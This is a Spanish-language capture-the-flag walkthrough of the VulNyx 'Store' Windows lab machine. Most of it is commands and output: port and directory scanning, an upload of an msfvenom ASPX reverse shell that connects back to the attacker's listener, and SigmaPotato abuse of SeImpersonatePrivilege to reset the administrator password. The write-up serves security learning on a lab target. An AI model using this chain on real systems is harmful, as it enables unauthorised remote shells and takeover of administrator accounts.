VulNyx - Store
Information
Store es una máquina virtual vulnerable Windows de dificultad fácil de la plataforma VulNyx, fue creada por el usuario d4t4s3c y funciona correctamente en el hipervisor VirtualBox.
Enumeration
Nmap
TCP
root@kali:~ ❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.49
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-12 10:11 CEST
Nmap scan report for 192.168.1.49
Host is up (0.00030s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
root@kali:~ ❯ nmap -sVC -p80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 192.168.1.49
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-12 10:13 CEST
Nmap scan report for 192.168.1.49
Host is up (0.00063s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:BE:00:8D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-10-12T17:14:24
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: 8h59m58s
|_nbstat: NetBIOS name: STORE, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:be:00:8d (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Shell (iis apppool)
445/TCP (SMB)
Basic Enumeration
root@kali:~ ❯ netexec smb 192.168.1.49
SMB 192.168.1.49 445 STORE [*] Windows 10 / Server 2019 Build 17763 x64 (name:STORE) (domain:Store) (signing:False) (SMBv1:False)
Shares
Null Session (Failed)
root@kali:~ ❯ smbclient -NL //192.168.1.49
session setup failed: NT_STATUS_ACCESS_DENIED
root@kali:~ ❯ smbmap --no-banner -H 192.168.1.49 -u '' -p ''
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Something weird happened on (192.168.1.49) Error occurs while reading from remote(104) on line 1015
[*] Closed 1 connections
root@kali:~ ❯ netexec smb 192.168.1.49 -u '' -p '' --shares
SMB 192.168.1.49 445 STORE [*] Windows 10 / Server 2019 Build 17763 x64 (name:STORE) (domain:Store) (signing:False) (SMBv1:False)
SMB 192.168.1.49 445 STORE [-] Store\: STATUS_ACCESS_DENIED
SMB 192.168.1.49 445 STORE [-] Error enumerating shares: Error occurs while reading from remote(104)
RPC
Null Session (Failed)
root@kali:~ ❯ rpcclient -NU "" 192.168.1.49 -c "srvinfo"
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
80/TCP (HTTP)
Site (/)
Directory Brute Force
root@kali:~ ❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.49/ -b 404,400
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.49/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,400
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220544 / 220544 (100.00%)
===============================================================
Finished
===============================================================
Al no obtener ningún recurso en el fuzzing anterior con los wordlist típicos, uso uno de SecLists llamado IIS.txt especifico para servidores de tipo Internet Information Services (IIS) y obtengo éxito con la ruta /aspnet_files
root@kali:~ ❯ find /usr/share/seclists -name IIS.txt
/usr/share/seclists/Discovery/Web-Content/Web-Servers/IIS.txt
root@kali:~ ❯ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/Web-Servers/IIS.txt -u http://192.168.1.49/ -b 404,400,403 --no-error
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.49/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/Web-Servers/IIS.txt
[+] Negative Status codes: 404,400,403
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/aspnet_files/ (Status: 200) [Size: 1602]
/iisstart.htm (Status: 200) [Size: 703]
/iisstart.png (Status: 200) [Size: 99710]
Progress: 216 / 216 (100.00%)
===============================================================
Finished
===============================================================
Site (/aspnet_files/)
Directory Brute Force
root@kali:~ ❯ gobuster dir -w /opt/common.txt -u http://192.168.1.49/aspnet_files -b 404,400
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.49/aspnet_files
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/common.txt
[+] Negative Status codes: 404,400
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 164] [--> http://192.168.1.49/aspnet_files/uploads/]
Progress: 4746 / 4746 (100.00%)
===============================================================
Finished
===============================================================
Insecure File Upload
Encuentro una página que permite subir imágenes
Extensions Brute Force
Uso el Intruder de Burp Suite y detecto que permite cargar archivos con extensión .aspx
Generate Payload (ASPX)
Mediante netexec verifico la arquitectura del servidor objetivo y es un sistema basado en x64
root@kali:~ ❯ netexec smb 192.168.1.49
SMB 192.168.1.49 445 STORE [*] Windows 10 / Server 2019 Build 17763 x64 (name:STORE) (domain:Store) (signing:False) (SMBv1:False)
Genero con msfvenom una reverse shell con extensión .aspx para un Internet Information Services (IIS)
root@kali:~ ❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.5 LPORT=443 -f aspx -o shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3388 bytes
Saved as: shell.aspx
Reverse Shell
root@kali:~ ❯ curl -sX GET "http://192.168.1.49/aspnet_files/uploads/shell.aspx"
Obtengo la shell como usuario iis apppool
root@kali:~ ❯ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.49] 49671
Microsoft Windows [Version 10.0.17763.3650]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami & hostname
iis apppool\defaultapppool
Store
Privilege Escalation
Enumeration
Privileges
El usuario iis apppool dispone del privilegio SeImpersonatePrivilege
c:\>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
OS & Kernel
Verifico nuevamente que estoy ante un sistema operativo Windows Server 2019 (x64)
c:\>systeminfo
Host Name: STORE
OS Name: Microsoft Windows Server 2019 Standard Evaluation
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00431-10000-00000-AA871
Original Install Date: 10/10/2025, 10:19:36 AM
System Boot Time: 10/12/2025, 10:10:53 AM
System Manufacturer: innotek GmbH
System Model: VirtualBox
System Type: x64-based PC
Abuse
SeImpersonatePrivilege
Uso SigmaPotato para escalar privilegios, descargo del repositorio el binario compilado
File Transfer
root@kali:~ ❯ mv /home/kali/Downloads/SigmaPotato.exe .
root@kali:~ ❯ impacket-smbserver a . -smb2support
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
c:\>cd %TEMP%
C:\Windows\Temp>copy \\192.168.1.5\a\SigmaPotato.exe SigmaPotato.exe
1 file(s) copied.
Run SigmaPotato
Ejecuto SigmaPotato.exe y cambio el password del usuario administrator
C:\Windows\Temp>.\SigmaPotato.exe "net user administrator Password1"
[+] Starting Pipe Server...
[+] Created Pipe Name: \\.\pipe\SigmaPotato\pipe\epmapper
[+] Pipe Connected!
[+] Impersonated Client: NT AUTHORITY\NETWORK SERVICE
[+] Searching for System Token...
[+] PID: 732 | Token: 0x796 | User: NT AUTHORITY\SYSTEM
[+] Found System Token: True
[+] Duplicating Token...
[+] New Token Handle: 948
[+] Current Command Length: 32 characters
[+] Creating Process via 'CreateProcessAsUserW'
[+] Process Started with PID: 1776
[+] Process Output:
The command completed successfully.
Verifico las nuevas credenciales y accedo como usuario administrator
root@kali:~ ❯ netexec smb 192.168.1.49 -u 'administrator' -p 'Password1'
SMB 192.168.1.49 445 STORE [*] Windows 10 / Server 2019 Build 17763 x64 (name:STORE) (domain:Store) (signing:False) (SMBv1:False)
SMB 192.168.1.49 445 STORE [+] Store\administrator:Password1 (Pwn3d!)
root@kali:~ ❯ netexec winrm 192.168.1.49 -u 'administrator' -p 'Password1' 2>/dev/null
WINRM 192.168.1.49 5985 STORE [*] Windows 10 / Server 2019 Build 17763 (name:STORE) (domain:Store)
WINRM 192.168.1.49 5985 STORE [+] Store\administrator:Password1 (Pwn3d!)
root@kali:~ ❯ evil-winrm -i 192.168.1.49 -u 'administrator' -p 'Password1'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami ; hostname
store\administrator
Store
Flags
Ya como usuario administrator puedo leer las flags user.txt y root.txt
*Evil-WinRM* PS C:\> type c:\users\user.txt
7ed*****************************
*Evil-WinRM* PS C:\> type c:\users\administrator\desktop\root.txt
d667****************************
Hasta aquí la resolución de la máquina Store.
Happy Hacking!